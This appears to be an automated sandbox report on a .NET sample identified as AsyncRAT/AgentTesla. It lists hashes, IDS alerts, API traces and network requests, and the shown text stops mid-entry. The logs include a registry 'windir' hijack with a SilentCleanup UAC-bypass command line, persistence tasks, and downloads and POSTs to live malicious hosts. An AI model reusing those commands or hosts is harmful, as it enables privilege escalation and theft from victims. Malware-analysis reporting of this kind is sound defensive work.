popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

zxcvb.exe

Gen1 AsyncRAT AgentTesla info stealer browser Chrome Malicious Packer Antivirus Google User Data HTTP ScreenShot Create Service KeyLogger Internet API DGA Http API FTP Socket Escalate priviledges DNS PWS Sniff Audio
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6401 June 4, 2021, 6:09 p.m. June 4, 2021, 6:23 p.m.
Size 943.0KB
Type PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5 e02ae8a88df1daa8a2cf8af319a386e3
SHA256 eb352ae2d557edc7edd516a4dd9122a4d7c2ea0646f9844135b7360fec1805f4
CRC32 3C6C14C7
ssdeep 24576:wGsGo+3OXAVS6W8ch8+5zIbT77KZ2JRT0BpFg:qp8V/65zOm0Kp
Yara
  • Win_Backdoor_AsyncRAT_Zero - Win Backdoor AsyncRAT
  • PE_Header_Zero - PE File Signature
  • Is_DotNET_EXE - (no description)
  • Malicious_Packer_Zero - Malicious Packer
  • IsPE32 - (no description)

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.101:49205 -> 95.216.186.40:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 185.215.113.77:80 -> 192.168.56.101:49201 2400023 ET DROP Spamhaus DROP Listed Traffic Inbound group 24 Misc Attack
TCP 192.168.56.101:49201 -> 185.215.113.77:80 2016141 ET INFO Executable Download from dotted-quad Host A Network Trojan was detected
TCP 185.215.113.77:80 -> 192.168.56.101:49201 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 185.215.113.77:80 -> 192.168.56.101:49201 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 185.215.113.77:80 -> 192.168.56.101:49201 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.101:49280 -> 185.215.113.77:80 2016141 ET INFO Executable Download from dotted-quad Host A Network Trojan was detected
TCP 185.215.113.77:80 -> 192.168.56.101:49280 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 185.215.113.77:80 -> 192.168.56.101:49280 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 185.215.113.77:80 -> 192.168.56.101:49280 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 34.88.140.135:80 -> 192.168.56.101:49206 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 34.88.140.135:80 -> 192.168.56.101:49206 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 34.88.140.135:80 -> 192.168.56.101:49206 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.101:49293 -> 162.159.130.233:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49320 -> 162.159.130.233:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 185.215.113.77:80 -> 192.168.56.101:49333 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 185.215.113.77:80 -> 192.168.56.101:49312 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 192.168.56.101:49279 -> 185.215.113.77:80 2016141 ET INFO Executable Download from dotted-quad Host A Network Trojan was detected
TCP 192.168.56.101:49279 -> 185.215.113.77:80 2019714 ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile Potentially Bad Traffic
TCP 185.215.113.77:80 -> 192.168.56.101:49279 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 185.215.113.77:80 -> 192.168.56.101:49279 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 185.215.113.77:80 -> 192.168.56.101:49279 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.101:49279 -> 185.215.113.77:80 2016141 ET INFO Executable Download from dotted-quad Host A Network Trojan was detected
TCP 192.168.56.101:49279 -> 185.215.113.77:80 2019714 ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile Potentially Bad Traffic
TCP 185.215.113.77:80 -> 192.168.56.101:49279 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 185.215.113.77:80 -> 192.168.56.101:49279 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.101:49279 -> 185.215.113.77:80 2016141 ET INFO Executable Download from dotted-quad Host A Network Trojan was detected
TCP 192.168.56.101:49279 -> 185.215.113.77:80 2019714 ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile Potentially Bad Traffic
TCP 192.168.56.101:49279 -> 185.215.113.77:80 2016141 ET INFO Executable Download from dotted-quad Host A Network Trojan was detected
TCP 192.168.56.101:49279 -> 185.215.113.77:80 2019714 ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile Potentially Bad Traffic
TCP 192.168.56.101:49279 -> 185.215.113.77:80 2016141 ET INFO Executable Download from dotted-quad Host A Network Trojan was detected
TCP 192.168.56.101:49279 -> 185.215.113.77:80 2019714 ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile Potentially Bad Traffic
TCP 192.168.56.101:49294 -> 162.159.130.233:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49318 -> 162.159.130.233:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.101:49205
95.216.186.40:443 		C=US, O=Let's Encrypt, CN=R3 CN=tttttt.me ff:46:0a:ed:46:1a:92:da:d9:8a:95:d8:4b:c2:3d:51:b8:73:06:13
TLSv1
192.168.56.101:49293
162.159.130.233:443 		C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com a6:26:df:21:b9:4f:a7:fb:ae:8d:87:ce:fb:7d:2b:c6:50:8b:ff:da
TLSv1
192.168.56.101:49320
162.159.130.233:443 		None None None
TLSv1
192.168.56.101:49294
162.159.130.233:443 		None None None
TLSv1
192.168.56.101:49318
162.159.130.233:443 		C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com a6:26:df:21:b9:4f:a7:fb:ae:8d:87:ce:fb:7d:2b:c6:50:8b:ff:da

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: C:\Users\Public>
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: start
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: /min C:\Users\Public\UKO.bat
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\Public>
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: reg
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: delete hkcu\Environment /v windir /f
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\Public>
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: reg
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM "
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\Public>
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: schtasks
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: exit
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: ERROR:
console_handle: 0x0000000b
1 1 0

WriteConsoleW

 buffer: The system was unable to find the specified registry key or value.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

 buffer: The operation completed successfully.
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: ERROR:
console_handle: 0x0000000b
1 1 0

WriteConsoleW

 buffer: The system cannot find the path specified.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

 buffer: SUCCESS: The scheduled task "Updates\pYVWAjXtpzU" has successfully been created.
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: SUCCESS: The scheduled task "Azure-Update-Task" has successfully been created.
console_handle: 0x00000007
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0049d2a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0049dae0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0049dae0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0049dae0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0049de20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0049de20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0049de20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0049de20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0049de20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0049de20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0049d9a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0049d9a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0049d9a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0049dae0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0049dae0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0049dae0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0049d5e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0049dae0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0049dae0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0049dae0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0049dae0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0049dae0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0049dae0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0049dae0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0049d1a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0049d1a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0049d1a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0049d1a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0049d1a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0049d1a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0049d1a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0049d1a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0049d1a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0049d1a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0049d1a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0049d1a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0049d1a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0049d1a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0049d6a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0049d6a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0049d6a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0049d6a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0049d6a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0049d6a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0049d6a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0049d6a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
Time & API Arguments Status Return Repeated

__exception__

 stacktrace: 
CopyPDBs+0x1b552 DllCanUnloadNowInternal-0x25a85 clr+0x1b1194 @ 0x728f1194
LogHelp_TerminateOnAssert+0x14061 GetPrivateContextsPerfCounters-0x53e1 clr+0x82ba1 @ 0x727c2ba1
0x6d48a9
0x6d479d
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72742652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7275264f
CoUninitializeEE+0xa5b4 CreateAssemblyNameObject-0x36a1 clr+0x29df8 @ 0x72769df8
CoUninitializeEE+0xa5eb CreateAssemblyNameObject-0x366a clr+0x29e2f @ 0x72769e2f
CoUninitializeEE+0xa6b9 CreateAssemblyNameObject-0x359c clr+0x29efd @ 0x72769efd
CoUninitializeEE+0xa75e CreateAssemblyNameObject-0x34f7 clr+0x29fa2 @ 0x72769fa2
LogHelp_TerminateOnAssert+0x16b0b GetPrivateContextsPerfCounters-0x2937 clr+0x8564b @ 0x727c564b
CreateAssemblyNameObject+0x2e9ca GetMetaDataInternalInterface-0x9aa5 clr+0x5be63 @ 0x7279be63
CreateAssemblyNameObject+0x2e4ff GetMetaDataInternalInterface-0x9f70 clr+0x5b998 @ 0x7279b998
CreateAssemblyNameObject+0x2e28d GetMetaDataInternalInterface-0xa1e2 clr+0x5b726 @ 0x7279b726
CreateAssemblyNameObject+0x2eacf GetMetaDataInternalInterface-0x99a0 clr+0x5bf68 @ 0x7279bf68
CreateAssemblyNameObject+0x2e84b GetMetaDataInternalInterface-0x9c24 clr+0x5bce4 @ 0x7279bce4
DllRegisterServerInternal+0xa898 CoUninitializeEE-0x2ba0 clr+0x1cca4 @ 0x7275cca4
DllRegisterServerInternal+0xa92b CoUninitializeEE-0x2b0d clr+0x1cd37 @ 0x7275cd37
DllGetClassObjectInternal+0x437c8 CorDllMainForThunk-0x48d33 clr+0x108841 @ 0x72848841
LogHelp_TerminateOnAssert+0x129a9 GetPrivateContextsPerfCounters-0x6a99 clr+0x814e9 @ 0x727c14e9
mscorlib+0x2d3711 @ 0x6ff13711
mscorlib+0x308f2d @ 0x6ff48f2d
mscorlib+0x2cb060 @ 0x6ff0b060
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72742652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7275264f
LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x727c1838
LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x727c1737
mscorlib+0x2d36ad @ 0x6ff136ad
mscorlib+0x308f2d @ 0x6ff48f2d
mscorlib+0x2cb060 @ 0x6ff0b060
microsoft+0x1069af @ 0x6df169af
microsoft+0x10261c @ 0x6df1261c
microsoft+0x1037a6 @ 0x6df137a6
0x6d401c
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72742652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7275264f
LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x727c1838
LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x727c1737
mscorlib+0x2d36ad @ 0x6ff136ad
mscorlib+0x308f2d @ 0x6ff48f2d
mscorlib+0x2cb060 @ 0x6ff0b060
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72742652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7275264f
LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x727c1838
LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x727c1737
mscorlib+0x2d36ad @ 0x6ff136ad
mscorlib+0x308f2d @ 0x6ff48f2d
mscorlib+0x2cb060 @ 0x6ff0b060
microsoft+0x1069af @ 0x6df169af
microsoft+0x103438 @ 0x6df13438
microsoft+0x14b2e5 @ 0x6df5b2e5
0x6d3ccb
0x6d37ce
0x6d047c
0x6d0213
0x6d008b
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72742652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7275264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72752e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x728074ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72807610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72891dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72891e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72891f7a

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0xe0434f4e
exception.offset: 46887
exception.address: 0x76a7b727
registers.esp: 2542040
registers.edi: 0
registers.eax: 2542040
registers.ebp: 2542120
registers.edx: 0
registers.ebx: 6424176
registers.esi: 5990648
registers.ecx: 285472593
1 0 0
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://185.215.113.77/axcxcvhgfc.exe
suspicious_features POST method with no referer header, POST method with no useragent header, Connection to IP address suspicious_request POST http://34.88.140.135/
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://34.88.140.135//l/f/L1VU1nkBuI_ccNKoeTXp/60386bf3c5b2b54595947b12ff770ab9abe3aa9a
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://34.88.140.135//l/f/L1VU1nkBuI_ccNKoeTXp/cc8a94f61ad1ac31ed9d2c0f0fef1ca23f6e10e5
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://185.215.113.77/ac.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://185.215.113.77/oxcxcvhgfc.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://185.215.113.77/rc.exe
suspicious_features POST method with no referer header suspicious_request POST http://veronika.ac.ug/index.php
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://185.215.113.77/ds1.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://185.215.113.77/ds2.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://185.215.113.77/cc.exe
suspicious_features POST method with no referer header, POST method with no useragent header suspicious_request POST http://veronikaa.ac.ug/softokn3.dll
suspicious_features POST method with no referer header, POST method with no useragent header suspicious_request POST http://veronikaa.ac.ug/sqlite3.dll
suspicious_features POST method with no referer header, POST method with no useragent header suspicious_request POST http://veronikaa.ac.ug/freebl3.dll
suspicious_features GET method with no useragent header suspicious_request GET https://tttttt.me/brikitiki
request GET http://185.215.113.77/axcxcvhgfc.exe
request POST http://34.88.140.135/
request GET http://34.88.140.135//l/f/L1VU1nkBuI_ccNKoeTXp/60386bf3c5b2b54595947b12ff770ab9abe3aa9a
request GET http://34.88.140.135//l/f/L1VU1nkBuI_ccNKoeTXp/cc8a94f61ad1ac31ed9d2c0f0fef1ca23f6e10e5
request GET http://185.215.113.77/ac.exe
request GET http://185.215.113.77/oxcxcvhgfc.exe
request GET http://185.215.113.77/rc.exe
request POST http://veronika.ac.ug/index.php
request GET http://185.215.113.77/ds1.exe
request GET http://185.215.113.77/ds2.exe
request GET http://185.215.113.77/cc.exe
request POST http://veronikaa.ac.ug/softokn3.dll
request POST http://veronikaa.ac.ug/sqlite3.dll
request POST http://veronikaa.ac.ug/freebl3.dll
request GET https://tttttt.me/brikitiki
request GET https://cdn.discordapp.com/attachments/720918485122940978/850158270907678730/Xypgtvglqrlgdvgezyimsisukuqhicz
request GET https://cdn.discordapp.com/attachments/720918485122940978/850158871501602823/Cdfyxciknlozqdclvjieazyvhyfqdvt
request POST http://34.88.140.135/
request POST http://veronika.ac.ug/index.php
request POST http://veronikaa.ac.ug/softokn3.dll
request POST http://veronikaa.ac.ug/sqlite3.dll
request POST http://veronikaa.ac.ug/freebl3.dll
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 1684
region_size: 1703936
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00690000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007f0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1684
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72741000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1684
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72742000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1684
region_size: 1572864
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02200000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02340000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00382000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00445000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0044b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00447000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003ac000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1684
region_size: 4096
